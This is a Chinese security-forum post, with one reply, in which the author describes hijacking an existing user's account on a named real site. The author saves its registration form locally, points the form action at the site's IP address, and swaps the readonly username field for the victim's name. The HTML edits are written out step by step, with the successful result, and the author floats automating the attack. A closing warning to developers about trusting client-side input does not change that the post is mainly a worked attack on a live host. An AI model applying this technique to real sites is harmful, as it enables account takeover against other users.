论坛: 菜鸟乐园 标题: 超级复制篇 复制本贴地址    
作者: word [word]    论坛用户   登录
完全利用ASP漏洞。 
我找到了用户注册的页面,输入用户名xxx(随便写的),返回的页面告诉我这个用户名已经被注册了。呵呵,今天就拿他开刀!继续输入一个名字:asgasg(随便输入)。没有人注册,进入第二页面,用户名已经确定了。 且asgasg这一栏已经不能修改。哦,想到了什么?:) 是的,我想到了看他的源代码。 
打开一看,如下: 
:<INPUT maxLength=20 name=username value="asgasg" readonly style="BACKGROUND-COLOR: #ffffff; BORDER-BOTTOM: #000000 1px solid; BORDER-LEFT: #000000 1px solid; BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; COLOR: #000000; HEIGHT: 19px; LEFT: 92px; TOP: 2px; WIDTH: 106px"> 

注意了,这个readonly就是为什么不能修改的原因,对付这个的最佳方法是什么?说出来就明白了。步骤: 
1。修改form字段: 
把<FORM NAME=newuser action="newuser2.asp" method=post onsubmit="return check();"> 
改为: 
<FORM NAME=newuser action="http://202.109.110.73/foxuser/newuser2.asp" method=post onsubmit="return check();"> 
2。修改username: 
<INPUT maxLength=20 name=username value="xxx" readonly style="BACKGROUND-COLOR: #ffffff; BORDER-BOTTOM: #000000 1px solid; BORDER-LEFT: #000000 1px solid; BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; COLOR: #000000; HEIGHT: 19px; LEFT: 92px; TOP: 2px; WIDTH: 106px"> 
3。保存文件 
4。打开这个htm文件,在页面上输入密码。按“下一步”,YES!,想不到这么容易。到了注册第三步,呵呵,返回: 

 祝贺你成功加入狐朋狗友。 您的用户名:xxx 登录口令:xxxxxx 

要是把readonly去掉,向改谁就改谁了!还可以用winsock编写个自动修改的软件……想起这些,我就高兴了。但我们的目的不是破坏,而是让网络更加安全。应次当然不会这么做的。 

总结一下,现在利用这种方法攻击的事件越来越多了,最主要原因是asp,cgi,php等的编写确实需要很好的考虑一下安全性,我曾经也对金山网景的个人主页系统进行了测试,他们使用的是php系统,也存在着类似的问题。在这里,请编写脚本程序的程序员们注意了,安全第一阿! 


地主 发表时间: 02/09 13:11

回复: lchml [lchml]   论坛用户   登录
让我试试再说好不好使!

B1层 发表时间: 02/09 14:04

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号